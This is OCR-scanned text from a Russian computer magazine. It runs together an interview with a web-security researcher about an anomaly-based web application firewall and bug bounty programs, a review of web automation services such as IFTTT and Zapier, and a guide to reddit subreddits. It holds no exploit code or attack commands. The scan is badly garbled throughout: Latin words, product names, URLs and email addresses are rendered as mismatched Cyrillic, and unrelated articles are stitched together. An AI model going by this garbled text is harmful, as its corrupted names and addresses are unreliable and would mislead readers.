ѴѴАР. Мы решили создать систему, которая будет лучше ѴѴАР. 

Предположим, администратор имеет место с ре- 
гулярными атаками. Они постоянно фиксируются в логах, 
потому что есть сканеры, серверные ботнеты, сканирования 
на баги ѴѴогбРгезз, которого у тебя никогда не было... Все 
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это отражается в \Л/АР. Он радостно все это отбивает, что-то 
■Ыэе ’ ит, что-то нет. Но понять что и где — очень трудно. Это 
одна большая каша. И что же делать? 

Мы придумали решение, в котором такой каши не бу- 
дет. Систему, которая будет четко отвечать на перечисленные 
вопросы и встраиваться в зесигііу сіеѵеіортепі: Іііесусіе, ко- 
торый все так любят и хотят внедрять. Плюс все это сделано 
для простых смертных, а не для «архитектурно зрелых» чува- 
ков. Простая, удобная и понятная система. 

Как сделать систему, которую нельзя обойти? 
Нужно дать ей возможность динамически изменять свое 
состояние. Когда состояние системы меняется, все стано- 
вится сильно сложнее. Даже если у тебя на руках имеется 
какой-то байпасе, ты его подобрал и применяешь, он будет 
работать лишь какое-то ограниченное время, а после пере- 
станет. По крайней мере, у тебя нет возможности эту же 
багу на ошибку регулярки ппосІ_5есигіі:у раскатать по всем 
уязвимостям. Ведь они все в разном состоянии, вычленить 
которое почти невозможно за время жизни этого состояния. 
Вот и вся хитрость. 

Что там внутри? Нейронные сети и машинное обуче- 
ние — только красивые слова. Большинство людей бросаются 
такими терминами, как нанотехнологиями, но ни разу в жизни 
нейронную сеть не делали, а если и делали, то не очень пред- 
ставляют, как это связано с какими-то реальными процессами. 
Поэтому я предпочитаю термины «аномалия», «статистика». 
Это более понятные и честные определения того, что физиче- 
ски можно сделать в алгоритмах. 

Сейчас у нас уже есть совместный релиз с НідЫоасІ 
І_аЬ. Инсталляция уже работает для клиентов Огаіог'а. Людям, 
которые хотят включить эту опцию бесплатно, надо отправить 
заявку на Ье{а-аг@оп5ес.щ . 

Клиенты смогут установить систему локально 
у себя. Они все равно будут работать с нашим облаком, 
но при этом трафик перегонять туда не будут. 

Это наиболее оптимальный вариант — мы не будем ви- 
деть трафик и «живые данные», не будем их обрабатывать. Мы 



будем видеть только выборочную выжимку, которую сформи- 
рует наша инсталляция у клиента. 

Какие-то крупные компании, которые захотят ставить 
его у себя, будут внедрять нас как віапсі аіопе. Это подой- 
дет для поисковых систем и проектов подобного рода. 

Зачем вообще нужен продукт из коробки? Мы делали 
продукт, ориентированный на конкретные требования. Первое 
и основное требование — производительность. Мы создавали 
очень производительную систему, непохожую на все, что сей- 
час существует. Благодаря этому наша система способна об- 
рабатывать много запросов и вносить маленькую Іаіепсу, даже 
если стоит посередине. 

Второе требование: мы сделали систему, которую 
можно использовать в Від Оа^а, то есть в проектах с огром- 
ными нагрузками. Когда у тебя огромная инфраструктура, 
ты даже не можешь переконфигурировать фронтенды. Если чуть 
изменишь настройки, это отклонение от производительности 
получится настолько сильным (в масштабах тысяч фронтендов), 
что тебе придется все вернуть на место. Поэтому мы делали си- 
стему, способную внедряться даже в очень нагруженные проек- 
ты, не меняя их, не внося погрешностей в их нормальную работу. 

Если у тебя большая производительность, твоя зада- 
ча — обработать все вообще без задержки. Твоя идеоло- 
гия — брать и обрабатывать запросы. Если ты будешь делать 
это в реальном времени, всегда будет Іаіепсу. Но если делать 
это не в реальном времени, используя очередь, задержек 
можно избежать. 

Суть Від Оаіа в том, чтобы обрабатывать запросы 
не в реальном времени, а ориентируясь на то, чтобы си- 
стема переваривала ровно столько, сколько она может пере- 
варить. Тогда, увеличивая ресурсы нашей системы, мы умень- 
шаем время реакции на атаку. 

Время реакции на атаку важнее, чем блокировка дан- 
ных. Атака редко происходит в один запрос, никакой гений 
с одного НТТР-запроса не сломает систему. Сначала он про- 
ведет некую подготовительную работу, и уже на этом этапе 
система его узнает. Узнает не его ІР-адрес, а именно профиль 
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как появился жнрр 

Когда не было интернета и был только 486-й, обо 
всех технологиях я узнавал из «Хакера». Тогда писа- 
ли очень веселые статьи вроде «истории взломов», мало 
что было понятно, но было очень интересно и захватыва- 
юще. Сейчас я иногда перечитываю их с улыбкой :). Также 
я познакомился с ІШІХ. 

Алиас Володя Воронцов появился тоже из жур- 
нала «Хакер». Я написал статью и подписал ее Володей 
Воронцовым. Я не знаю почему. Ника у меня тогда еще 
не было, вот и придумал такое. Это был 2008 год. 

Когда я отправил статью, мне ответили, что еще ну- 
жен ник. Так появился и сЮгпрр. 

Самое главное — я никогда не шифровался, все 
получилось как-то само собой. Я сочинил этого Воло- 
дю Воронцова... от балды. Я боялся, что мой работодатель 
прочитает мои статьи и не очень хорошо к этому отнесет- 
ся. Я не хотел такого и изобрел псевдоним. Наверное, 
многие так поступают. Но больше это я по глупости сде- 
лал, не подумав. А потом оно примелькалось, ко мне стали 
относиться как к автору этих статей, и я не мог отвечать 
по-другому. 

Для большинства людей я деанонимизировался 
сразу. Вопрос принципов общения, каких-то жизнен- 
ных ситуаций. А вообще, недавно деанонимизировался 
официально, выступив на конференции РИТ++. Надоело 
немного. Хотя какая разница, вон Крис Касперски живет 
и не парится. У меня похожая ситуация, и она меня тоже 
мало волнует. Главное, чтобы каких-то глупых, ненужных 
ассоциаций не возникало. Если не возникает и люди отно- 
сятся ко мне хорошо, то мне не принципиально, как меня 
зовут. 
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деле не станет. А вот если донести эту инфор- 
мацию до масс, когда все узнают о таких ба- 
гах, то и люди организатора тоже — о чудо! — 
будут лучше об этом информированы. 

В целом к геѵѵагсі- программам я отно- 
шусь положительно. Стараюсь поддержи- 
вать людей. По мере возможности стараюсь 
помогать им, высылать что-то интересное. 

Сам я участвовал в ряде программ. 
В Яндекс засабмитил больше двадцати ба- 
гов. Все они были критические, серверные — 
глупых ХЗЗ не было. Я находил баги в чтении 
файлов, отправке запросов, инжекты, ошиб- 
ки логики, обход авторизации. 

С «Островами» вышло смешно. Сра- 
зу после объявления о них и открытия беты 
( - іа.ѵап с ех.гц ) я поломал их через паблик. 
Минут через пять. Илья Сегалович (один 
из основателей Яндекса. — Прим, ред.) на- 
писал в твиттере, что они выпускают новую 
систему поиска, кто-то ретвитнул это сообще- 
ние — а я нажал на ссылочку и сразу нашел 
несколько уязвимостей и одну критическую. 
Хотя бага простая была, всего лишь на ско- 
рость задачка. 

Получил вознаграждение и от Соодіе 
за СЬготе. В браузере был обход ограни- 
чений, а именно в функционировании зате 
огідіпаі роіісу. Это ошибка логики, Я ничего 




человека, который совершает примерно вот такие действия. 
И этот профиль блокируется. Дальше, если система понимает, 
что эти действия правда опасны, она выкидывает этого чело- 
века и уведомляет, что вот здесь — реальная проблема. Все. 
Потом ты автоматически решаешь задачу и защищаешь си- 
стему. Кстати, такие идеалы в некоторые коммерческие про- 
дукты тоже вложены, но работает это не так. Долго объяснять, 
но не так :). 

Проблема 0-<1ау вообще не в том, что они существу- 
ют, а в том, что под их блокировку невозможно настроить 
никакие сигнатуры. По понятным причинам — ведь ты его 
не знаешь, на то он и 0-сІау. А мы умеем блокировать 0-сіау 
не по сигнатурам. Именно поэтому нас очень трудно обойти, 
вернее, практически нереально. 

АЕШААй-П РОГРАМ М Ы 

Как стать хорошим практическим безопасником? Нужно 
пойти в лес, найти пенек и перевернуться через него три раза. 
Ну конечно, нужно работать, работать и работать. 

Что вообще такое «практический безопасник»? Это че- 
ловек, который получил возможность что-то поломать и чест- 
но выполнил свою работу. Чтобы что-то поломать и не нару- 
шить закон, не нужно делать ничего. Достаточно скачать любое 
ореп эоигсе приложение, каких миллион, и расфигачить его. 
А потом уведомить разработчиков и дождаться релиза ис- 
правлений до публикации уязвимостей. Или воспользоваться 
программой вознаграждений какой-нибудь компании — тогда 
ты вообще будешь самым настоящим, профессиональным 
практическим безопасником. Ведь ты будешь делать свою ра- 
боту и фактически не нарушишь никаких законов. 

Любая программа вознаграждений — это неокупающи- 
еся деньги, зато на таком хорошо делать имя. Во всем этом 
больше РН, нежели чего-то еще, однако РП не всегда уда- 
ется получить. Проблема программ вознаграждений в том, 
что они нужны, чтобы платить людям «немножечко денег», 
а не для того, чтобы прославить их. 

Часто бывает, что организаторы программ принципи- 
ально против разглашения деталей уязвимости, хотя это 
не по правилам. Они говорят: «Да, вы сделали классную штуку, 
но вы не должны никому о ней рассказывать». Хотя это проти- 
воречит самой сути программы. Но вот так бывает, когда не- 
ожиданно получаешь госітам, где надо было ХЗЗ'ки искать :). 

Если организаторы возражают против огласки, они 
сами же от этого страдают. У них получается зесигііу Ьу 
оЬзсигіТу. Им кажется, что если они не будут никому говорить 
о своих глупых багах, то таковых станет меньше. На самом 



не реверсия, ничего не делал — просто нашел 
ошибку. Через этот баг можно было с НТМІ_-странички тырить 
локальные файлы на машине пользователя. Причем она рабо- 
тала в те времена, когда в СІіготе еще не было своего ридера, 
через Набіі и РОР. Эксплойт там состоял из трех частей. 

На самом первом РНО я рассказывал про эту багу, 
но к тому моменту в СНготе уже появился свой ридер, а бага 
исполнялась только через продукты АбоЬе и только в СІіготе. 
То есть тогда она уже не имела особого смысла. 

Мой смартфон Иокіа — это тоже приз от (Мокіа за уча- 
стие в их гешагб-программе. 

ПАРА СОВЕТОВ И ТРЕНДЫ ИВ 

Проблема продуктов обычно в том, что их делают про- 
граммисты. Они и обходятся и работают так, как нужно про- 
граммистам или чуваку, что писал техническое задание. Прак- 
тически нет продуктов, которые делают люди, умеющие ломать. 

Совет разработчикам веб- приложений всегда один: 
если берешься на чем-то писать проект, пиши его и вы- 
пускай только тогда, когда уверен, что изучил инстру- 
мент, который используешь. Изучил то, на чем пишешь. 
Чаще всего ошибки основаны именно на том, что люди ис- 
пользуют нечто, не понимая, что хотят сделать. Если ис- 
пользуешь обіес* геіаііопаі тобеі, попробуй сначала понять, 
что это, и только потом писать на нем код, используя эту па- 
радигму. Возможно, сейчас он тебе не подходит. Или наобо- 
рот — возможно, он подходит тебе, но ты поленился до кон- 
ца понять, о чем это. 

То же самое в РНР. Там много интересного, опять же 
много фреймворков. Часто проблему пытаются решить не так, 
как нужно, и отсюда возникают новые проблемы. 

Важный совет: нужно следить хотя бы за іприі ѵаіібайоп. 
Проверяйте все данные, приходящие от пользователя, от его 
запроса. Если вы вообще как-то их обрабатываете, то сначала 
их нужно проверять. Это сразу ощутимо сократит количество 
ошибок, по сути, останутся только ошибки логики. 

К получению сертификатов я лично отношусь плохо. 
Готов обучаться у профессионалов, но таких совсем немного, 
к сожалению. Они есть, конечно, но в России тренинги не ведут. 

Тренды уже давно примерно одинаковы, из года 
в год. Это инъекции, как бы их ни называли. Они всегда будут, 
они самые тупые, простые и жесткие. 

Также сейчас публикуется много ошибок авториза- 
ции, ошибок логики. Из недавнего — это история со сменой 
пароля в Зкуре. Это чисто логические баги, а не классические 
іпри^ѵаіібаііоп. Так сложилось, что их нашли очень много за по- 
следнее время. ЗС 
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Как объединять веб-сервисы в новые инструменты 



і 



Отличительная особенность многих веб-приложений в том, что они, практи- 
чески соответствуя канонам ІЛМІХ-\л/ау, превосходно выполняют одну функ- 
цию, лишь иногда предполагая некоторое ограниченное взаимодействие. 
Но для того чтобы аналогия была полной, не хватает главного элемента — 
аналога пайпов, который позволил бы связывать между собой сервисы 
для получения нового функционала. Мы подобрали инструменты, отлично 
решающие эту задачу, — различные мэшапы и автоматизаторы, способные 
связать разрозненные продукты в единое рабочее окружение. 
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Первыми в нашем списке идут «трубы» — бесплатный сервис, который по праву можно 
назвать «дедушкой» жанра мэшапов. Основная идея — обработка потоков текста путем 
каскадного навешивания различных фильтров, агрегаторов и обработчиков. Чувствуется, 
что разработчики вдохновлялись старым добрым юниксовым пайплайном. Пользователю 
предлагается прибегнуть к базе уже существующих пайгюв или создать свой. По сути, каж- 
дый пайп — это небольшая программа, которая пишется или, скорее, рисуется в специ- 
альном редакторе. 

В основе пайпов лежит несколько базовых понятий: 

1 . Источник данных {все крутится вокруг формата ВЗЗ, то есть это сам НЗЗ-фид, поиско- 
вая выдача либо запрос на специальном языке ѴОІ_). 

2. Пользовательский ввод — данные, которые можно вводить в специальные поля пайпа 
для изменения логики его работы. Например, ник в твиттере или поисковый запрос. 

3. Обработчики — множество различных функций, которые на вход получают данные из 
пользовательского ввода или источника, что-либо с ними делают и выдают результат 
своей работы. Кстати, в качестве обработчика можно использовать даже другой пайп. 

Также стоит отметить, что результат выполнения пайпа можно получать в различных 
форматах при запросе специального адреса вида: ййоѴ/рірез.ѵаГюо.сот/рірез/ріре.гип? 
іб=РІРЕ ІР& :.і— іс , что делает возможным использовать его в своих скриптах или на 
странице сайта. 

Все это, с одной стороны, делает пайпы довольно гибким инструментом для обработки 
данных, с другой — добавляет некоторую сложность в написании своих «скриптов». Кстати, 
на сайте есть еще и куча уже готовых и работающих пайпов на разные случаи жизни. На- 
пример: 

* Ы і ,1 у /12х52Тгс — пайп для генерации единого ВЗЗ-фида из ОРМІ_-файла (специальный 
формат для составления списка фидов); 

• О; 71 3 ЕС) а — универсальный поиск по куче различных ресурсов, фильтрующий и агре- 
гирующий результаты. 
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II" ТГііз Тйеп ТИаІ — настоящий любимчик публики, один из самых популярных сервисов по- 
добного рода. Он предлагает несколько иной подход к обработке данных, нежели УаГюо 
Рірез, — в основе лежит идея веб-хуков. ІРТТТ взаимодействует со множеством АРІ раз- 
личных сервисов, позволяя создавать рецепты — мини-скрипты определенного формата. 
Рецепт состоит из триггера — условия, по которому обрабатываются данные (новый файл 
в дропбоксе, новый твит, новая фотография в инстаграме), и действия, которое выполня- 
ется в случае срабатывания триггера (написать письмо, изменить статус в фейсбуке). Дан- 
ные обновляются периодически, раз в 15 минут, поэтому особой задержки в реакции на 
триггеры не происходит (кстати, некоторые триггеры срабатывают, как только происходит 
определенное событие, — в ІРТТТ их называют «молниеносными»). Стоит отметить, что, не- 
смотря на всю простоту идеи, ІРТТТ довольно мощный сервис, позволяющий настраивать 
синхронизацию и автоматизацию различных сервисов. При создании рецепта существует 
еще такое понятие, как ингредиенты, — по сути, контекст выполнения триггера, в котором 
присутствуют переменные значения, такие как текст твита или тема письма. Их можно и 
нужно использовать в действиях (если, конечно, они получают какие-то данные на ввод). 
Замечу еще, что сервис ну очень приятно выглядит и имеет довольно большую базу уже 
готовых рецептов (можно также поделиться и своими). Из тех, которыми пользуюсь я: напо- 
минание о погоде на почту, а также автоматическая загрузка понравившихся фотографий 
на дропбокс. 

Также интересными мне показались следующие рецепты: 

* Ведение журнала всех понравившихся видео с ѴоиТиЬе в Еѵегпоіе. Для этого создадим 
новый рецепт, в качестве «Тйіз» укажем канал УоиТиЬе, триггер Ыеѵѵ Іаѵогііе ѵісіео, а в 
качестве «ТГіа!» — канал ЕѵегпоГе, действие Аррепб Іо поГе. Осталось ввести настройки 
действия (журнал, в который сохранять заметку, имя заметки и тому подобное) — и го- 
тово. 

* Автоматический загрузчик файлов из Стаіі в РгорЬох. Рецепт состоит из триггера 
СтаіІ — > ГЧеѵѵ етаіі Ггот зеагсМ и действия РгорЬох — > АсШ ТМе ігот ІІНІ_. Дополнительно 
в настройках указываем поле «Зеагсіт 'Гог: сІоіл/пІоасШіізГіІе» и назначаем папку для за- 
грузки. Теперь можно самому себе послать по почте ссылку на файл — он автоматом 
окажется в папке дропбокса. 
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2аріег появился чуть позже ІРТТТ, но логика работы тут полностью та- 
кая же: есть рецепты (только здесь они называются запы}, события и 
действия. Есть база готовых залов и возможность создавать свои. На 
самом деле оба мэшапа очень похожи, и все их различия появляются в 
результате разницы подхода: если ІРТТТ — это сервис автоматизации 
твоей социальной активности, который должен просто облегчить жизнь, 
то 2аріег — это бизнес- инструмент, который может решать и вполне ра- 
бочие вопросы (для этого в сервисах присутствуют Вебтіпе, ІепсІезк, 
Азапа, Зборііу и РауРаІ). Основная киллер-фича запиера — количество 
сервисов. Если в ІРТТТ их в районе 60, то тут их около 250. Создатели, 
кажется, взяли курс на подключение всего, что только можно, — и это 
здорово. Самый главный минус (разумеется, для пользователей) — сер- 
вис платный. Конечно, тут есть бесплатный план, для того чтобы можно 
было попробовать сервис, но его возможности совершенно несравнимы 
с бесплатными возможностями ІРТТТ Цены, кстати, тоже не символиче- 
ские — минимальная подписка стоит 15 долларов в месяц, поэтому мне 
кажется, что целесообразность использования запиера упирается в то, 
окупается ли его цена лично тебе. И если, например, он сильно сэконо- 
мит время фрилансеру, освобождая от неприятной рутины, — то почему 
бы и нет? Примеры рабочих действий: 

• Автоматическое создание тикета в Вебпліпе из записи в Еѵегпоіе. 
Событием выбираем Еѵегпоіе — > Иеѵѵ ІЧоІе, действие — Вебтіпе — ► 
Сгеаіе Іззие. Не забываем указать имя журнала в Еѵегпоіе, для кото- 
рого применим данный зап. 

• Напоминание в НірСИаІ: при создании карточки в ТгеІІо. Тут все со- 
всем просто: событием служит ТгеІІо — > ІЧе\л/ Сагсі, в роли действия 
НірСИаІ: — ► Сгеаіе Меззаде. 



а:>1 


ГІ-? 


Абб Аза па Тазк (о Ооо§1е Саіепгілг 
| АиіотаіісаІІу абб Азапа газкз го Сооціе Саіепбаг. 






Ріск уоиг Тгі^ег апсі Асііоп Гог (Ні$ 2а р 



* ■. 









ѵ. * * и ѵ 




Гм а 

тМі ГЖ 




2 аріег — продвинутый клон ІРТТТ, способный решать вопросы 
бизнес-пользователей. Увы, минимальная подписка стоит к $ 
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А это уже сервис от поискового гиганта. В его основе лежит идея мониторинга результатов поиско- 
вого запроса с течением времени. Фактически ты можешь настроить «алерты» на появление новых 
результатов по запросу. На самом деле, что может быть логичней и правильней — ведь база гугла 
обновляется все быстрее и быстрее. Они умеют фильтровать всякий мусор и отбирать наиболее ре- 
левантные данные. В списке параметров оповещения: 

• сам запрос (поддерживается также синтаксис поисковых запросов гугла); 

• тип запроса (все, новости, блоги, видео, обсуждения, книги); 

• частота уведомлений (в режиме реального времени, раз в день, раз в неделю); 

- фильтр лучших результатов или всех; 

- отправка результатов на етаіі или в виде ВЗЗ-фида. 

Что таким образом можно мониторить? Я думаю, каждому — свое. Кто-то может мониторить 
скидки на товары или услуги, кто-то — новости о падениях метеоритов. А можно вбить свое имя и 
ник и получать новые упоминания в интернете. Кстати, еще одним вариантом использования будет 
отслеживание новостей о новых уязвимостях какого-то продукта, например: «Наііз ѴиІпегаЬІІІІу» — для 
оповещений о новых проблемах в безопасности фреймворка. 

Итак, в качестве полезных юзкейсов: 

• отслеживание скидок, купонов. Для этого создаем алерт со словами «соироп собе» ОН «сіізсоипі 
сосіѳ»; 

• оповещение при появлении новых упоминаний о человеке — алерт с именем и ником в твиттере. 
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Мэшап-сервис для работы с файлами. Он схож в идее с ІРТТТ, но с уклоном на обработку фай- 
лов. Единственное событие здесь — добавление в папку облачного хранилища (поддержива- 
ются йгорЬох, Ѳоодіе Огіѵе, ЗкуОгіѵе, Вох} файла, а вот действий здесь может быть довольно 
много: 

- Синхронизация с другими облачными хранилищами Вох, ЗкуОгіѵе, Соодіе Огіѵе, а также с 
РТР-сервером. 

■ Для изображений возможны различные простые операции, типа изменения размера, пере- 
вода в оттенки серого, поворот, добавление водяного знака. 

• Для звуковых файлов — конвертация в другой формат. 

• Для текстовых файлов: конвертация в РОР, форматы электронных книг, загрузка на КіпсІІе, 
распечатка через облачный принтер Соодіе. 

• Для всех типов файлов: добавление в архив, переименование, шифрование/дешифрова- 
ние. 
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В принципе, удобно, если нужно настроить какую-то автоматическую обработку файлов (на- 
пример, новых скриншотов}, а другие сервисы ничего для этого предложить не могут. 

Для настройки синхронизации папки ОгорЬох с РТР-сервером необходимо авторизовать веб- 
приложение, выбрать папку для синхронизации (или создать новую) и ввести реквизиты РТР- 
сервера. 

Для автоматического конвертирования аудиофайла также укажем нужную папку, для которой 
будет работать действие, выберем действие Сопѵегі Аисііо и соответствующий формат (МРЗ, 
АІРР, РІ_АС , М4А, ОСС, ѴѴАѴ или ѴѴМА). Удобно, если подходящего конвертера под рукой не ока- 
залось. 
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Несмотря на то что мы сегодня рассматривали исключительно веб-приложения, я решил добавить этот 
интересный проект от МісгозоЙ. оп{Х) — это приложение для андроида, которое позволяет делать при- 
мерно то же самое, что и описанные выше сервисы, — выполнять действие при наступлении опреде- 
ленного условия. 

Из интересных особенностей: 

• Правила (они же рецепты в терминологии ІРТТТ} пишутся на ЛаѵаЗсгірі. 

• В качестве триггеров могут выступать различные источники данных (в том числе и сенсоры телефо- 
на): погода, время, новости, сигнал ѴѴІ-Рі-сети, уровень батареи и СРЗ-положение. 

• В качестве действий можно также пользоваться АРІ телефона, показывая уведомления, запуская при- 
ложения и совершая другие действия. 

Проект скорее экспериментальный, но это не помешало ему обрасти сообществом энтузиастов. 
Разумеется, в лучших традициях подобных сервисов, есть возможность создавать новые рецепты, об- 
мениваться ими и устанавливать (считав телефоном специальный (ЭВ-код). 

Поскольку, в отличие от предыдущих проектов, здесь используется АРІ телефона, а рецепты пишут- 
ся на настоящем языке программирования, у разработчика появляется дополнительная свобода для 
творчества. Из наиболее интересных правил можно отметить: 

• правило, заставляющее телефон проиграть рингтон, если звонит кто-то из трех твоих самых частых 
контактов, даже если телефон находится в тихом режиме 1 8ѴгХО( ; 

• напоминание взять с собой зонт при первой разблокировке экрана с утра, в случае если сегодня по 
прогнозу ожидается дождь бФ'у/МрНЗЕи 
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Откуда начать читать 

Разумеется, тебе знаком ресурс 
гесШ.сопл, хотя он не столь популя- 
рен в наших широтах, как на Западе. 
Песісііі: — это странная штука, которая 
«по-научному» называется социаль- 
ным новостным сайтом. Несмотря 
на популярность социальных сетей, 
гебсііі продолжает расти и процве- 
тать. Сегодня речь пойдет не о самом 
гесісііі: и его истории, а о том, как со- 
риентироваться в океане информа- 
ции, который он предлагает. Несісііі: 
славится сабреддитами (подреддиты, 
зиЬгесШз) — сообществами, клуба- 
ми по интересам. Их десятки и сотни 
тысяч — развлекательных и полез- 
ных, популярных и интересных узкому 
кругу людей. Для начала предлагаем 
подборку гарантированно интересных 
и тематических сабреддитов. 




Мария «МіІгіІІ» Нефёдова 

тНгіП@геа1. хакер, ш 




МИНУТ 

В СРЕДНЕМ 
ПОЛЬЗОВАТЕ- 
ЛИ ПРОВОДЯТ 
НА РЕ001Т, НТО 
ОЧЕНЬ МНОГО 
ПО СОВРЕМЕН- 
НЫМ СЕТЕВЫМ 
МЕРКАМ 
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Казалось бы, название этого сабреддита говорит 
само за себя — техподдержка она и в Африке тех- 
поддержка. Однако все не так просто, как кажется 
на первый взгляд. Нет, здесь в самом деле часто 
спрашивают совета по самым разным софтверным, 
железным и прочим айтишным вопросам и обсуждают 
любые технические проблемы. У этого сабреддита де- 
сятки тысяч читателей, так что здесь накоплено немало 
ценной информации. В наличии, к примеру, подборки 
по удалению вирусов и сборники полезных приложений. 

Здесь в целом велики шансы на то, что твою проблему уже 
обсуждали и решили (достаточно просто поискать). Од- 
нако этот сабреддит отличает именно универсальность — 
за помощью сюда обращаются как подкованные профес- 
сионалы, так и простые пользователи (притом любых операционных систем и девайсов). 
Разумеется, количество простых юзеров перевешивает, и чтение /гДесЬзирроіІ превраща- 
ется в неплохое развлечение. Вопросы вроде «I деі а сотрійег збірреб Тгот Атегіса, ѵѵіІІ іТ 
соппесТ Іо Аизігаііап іпТегпеІ?» здесь совсем не редкость. 





ОАИ.ѴРПОСНАММЕЯ 



Этот сабреддит будет полезен тем, кто смыслит в програм- 
мировании и предпочитает держать голову «в тонусе». Если 
ты как раз не знаешь, чем бы занять мозг в свободное от рабо- 
ты время, — добро пожаловать. В /г/баііургодгаттег постоян- 
но публикуются разнообразные программистские челленджи. 
Существует простое расписание: по понедельникам публикуют 
задачи легкого уровня, по средам — среднего, а по пятницам — 
настоящий хардкор. 

Все задачи добавляются самими пользователями, модера- 
торы сабреддита их лишь обновляют. Решение можно писать 
на любом языке, приветствуются креативность и нетривиаль- 
ность подхода. Проверяют решения самим же комьюнити, 
что добавляет процессу дополнительной остроты. Здесь также 
существует собственная система достижений — пользователи 
могут получать серебряные или золотые медали за самые раз- 
ные заслуги. Ценится все — от хороших алгоритмических навы- 
ков до самого чокнутого или смешного кода. 
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Крайне полезный сабреддит, чье существование в очередной 
раз доказывает: хоронить ПК пока все же рановато, несмотря 
на победное шествие смартфонов и планшетов по миру. Саб- 
реддит о самостоятельной сборке и планировании ПК читают 
больше 120 тысяч человек. Здесь можно задавать любые во- 
просы о «компьютерных потрошках». Сборка оптимальной 
системы водяного охлаждения, сборка бесшумной системы, 
перестановка компонентов из ноутбука в стационарный ПК, 
просто создание сбалансированной конфигурации в преде- 
лах заданной суммы — все это и многое другое можно найти 
здесь. От многочисленных ресурсов подобного рода сабреддит 
отличает действительно полезный, быстрый и весьма добро- 
желательный фидбек. Запостить свою конфигурацию на суд 
общественности можно по уже готовому шаблону, что тоже об- 
легчает жизнь. К тому же в /г/ЬиіІбарс накоплено великое мно- 
жество «железной» мудрости в форме статей, видео и прочего, 
так что, вероятно, спрашивать не придется вовсе — достаточно 
воспользоваться поиском. 
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Стремительно набирающая популярность тема — ЗО-принтеры. 
Еще лет пять назад сложно было помыслить о том, чтобы за- 
иметь 30- принтер дома, для этого нужно было обладать не- 
дюжинным желанием, инженерной смекалкой и значительной 
суммой вечнозеленых денег. Теперь, когда в продаже стали 
доступны домашние модели, чья цена колеблется в пределах 
тысячи долларов, приобщиться к печати физических объектов 
стало значительно проще. /г/Збргіпііпд — настоящий кладезь 
информации о трехмерной печати. После чтения этого сабред- 
дита как-то сразу отпадают вопросы о том, как люди умудря- 
ются печатать на ЗБ-принтерах пригодные к использованию 
оружейные детали или зачем на ТІте Рігаіе Вау нужен раздел 
с готовыми макетами. Здесь ты найдешь любую информацию, 
которую только можно собрать о 30-печати, — готовые макеты, 
обсуждения софта, в котором макеты строят, полезные ссылки, 
новости индустрии, всевозможные гайды и советы. Информа- 
ции здесь, пожалуй, больше, чем на форумах НерВар. 
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Смешной, порой трогательный и, как ни странно, полезный саб- 
реддит, название которого переводится как «объясните мне 
так, будто мне пять лет». Вся суть ясна из названия: здесь мож- 
но попросить других людей объяснить тебе любое явление так, 
будто тебе пять лет. А это значит — никакой грубости и предвзя- 
тости, сплошное дружелюбие и простота. Троллей и неадекват- 
ных личностей здесь нещадно банят. Вот только несколько при- 
меров из /г/ехріаіпіікеітбѵе: отличия основных христианских 
конфессий, социализм и почему все его не любят, протокол 
ТСР/ІР, бозон Хиггса. Слабо объяснить подобное пятилетнему 
ребенку? Да, это настоящая головоломка, и люди, как ни стран- 
но, умудряются с ней справляться. По итогам обсуждений даже 
снимают серию видеороликов, где реальным пятилетним детям 
зачитывают объяснения различных мозгодробительных штук, 
данные пользователями ЕЫР 1і пѵугІ.сот/оа7ѵппа . 













Еще один сабреддит с говорящим названи- 
ем — здесь размер имеет значение, здесь 
любят и почитают лаконичный и вырази- 
тельный код практически во всех его про- 
явлениях. /г/ііпусосіе, скорее всего, при- 
дется по душе тем, кого выше заинтересовал 
баііургодгаттег :). Как известно, минимизация 
кода — своего рода искусство, и здесь это искусство ценят 
по достоинству. Лаконичность кода тут рассматривают как с точ- 
ки зрения спортивного интереса (периодически в /г/ііпусосіе даже 
проводятся разнообразные челленджи), так и с точки зрения прак- 
тичности. Веб-сервер на 42 строчки кода? Отлично! ѴѴікі-движок, 

который меньше обычного МѴС-контроллера? Замечательно! А также безумные игры ми- 
кроскопического объема, крошечные эксплойты, компактные ореп зоигсе решения, при- 
званные заменить тяжелое и неудобное ПО, и многое другое. Одним словом, данный саб- 
реддит приветствует любые изящные и компактные решения, и здесь будут рады оказать 
посильную помощь в их создании и дать совет. 







МИЛЛИОНОВ 

УНИКАЛЬНЫХ 
ПОЛЬЗОВАТЕЛЕЙ 
ПРОСМАТРИВАЮТ 
РЕЦЦІТ 5 МИЛ- 
ЛИАРДОВ РАЗ 
В МЕСЯЦ 



И еще один крайне популярный сабреддит, у которого почти три 
с половиной миллиона читателей, — ДДобауІІеагпесІ (сегодня 
я узнал). Идея сабреддита проста, как и все гениальное, — все 
мы каждый день узнаем нечто новое. Это могут быть какие-то 
мелочи или что-то, способное поставить всю нашу жизнь с ног 
на голову. Так почему бы не поделиться этим с другими? Пра- 
вила просты: публиковать узнанное нужно без личного мнения 
(«сегодня я узнал, что N - отличный фильм» — не допускает- 
ся). Нужно давать релевантные ссылки. Важно, чтобы новости, 
посту, видео и так далее было не больше двух месяцев, в про- 
тивном случае источник считается устаревшим. В итоге в этот 
сабреддит стекаются самые разные, безумные, удивительные, 
шокирующие и забавные публикации со всей Сети. К примеру, 
у Джими Хендрикса, оказывается, была синэстезия — он в бук- 
вальном смысле мог видеть музыку. А шоколадное молоко при- 
думали в Ирландии :). 
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Пожалуй, самый известный за пределами гесШ сабреддит, 
а также один из самых популярных — более трех миллионов чи- 
тателей. Название расшифровывается как «1 апл а» (я такой-то) 
или как АМАз (Азк Ме Апуібіпд — спросите меня о чем угодно). 

Сабреддит открыт для всех, а значит, сюда может прийти любой 
человек и поведать о себе, отвечая на вопросы других пользовате- 
лей. Формат задает само название сабреддита: «Я хакер», «Я отец-оди- 
ночка», «Я профессиональная теннисистка», «Я люблю нюхать резину», 

«Я хочу полететь в космос» и так далее. Здесь существует только одно 
основное правило — в [АМА требуют доказательств того, что ты тот, 
за кого себя выдаешь (можно отправить их напрямую модераторам). 

В остальном ограничений практически нет, что и делает сабреддит та- 
ким интересным. Здесь бывали многие известные люди, включая президента Барака Обаму 
и Билла Гейтса. Здесь множество представителей редких и необычных профессий, а также 
необычных и экстравагантных личностей. Словом, это великолепный таймкиллер. 




Но что-то мы все о популярном и очевидном. Завершая под- 
борку, приведу пример того, что на геббй есть не только та- 
кое. /г/по^ар — совершенно реальное сообщество анонимных 
(и не очень) порноголиков. Ничего смешного здесь, увы, нет. 
Убедиться в этом можно, посмотрев, к примеру, это выступле- 
ние с ТЕО: ѵоиЩ.Ье/ѵѵЗР82Аѵу8РіЦ . где рассказывается и о про- 
блеме, и о комьюнити, которое борется с ней и помогает друг 
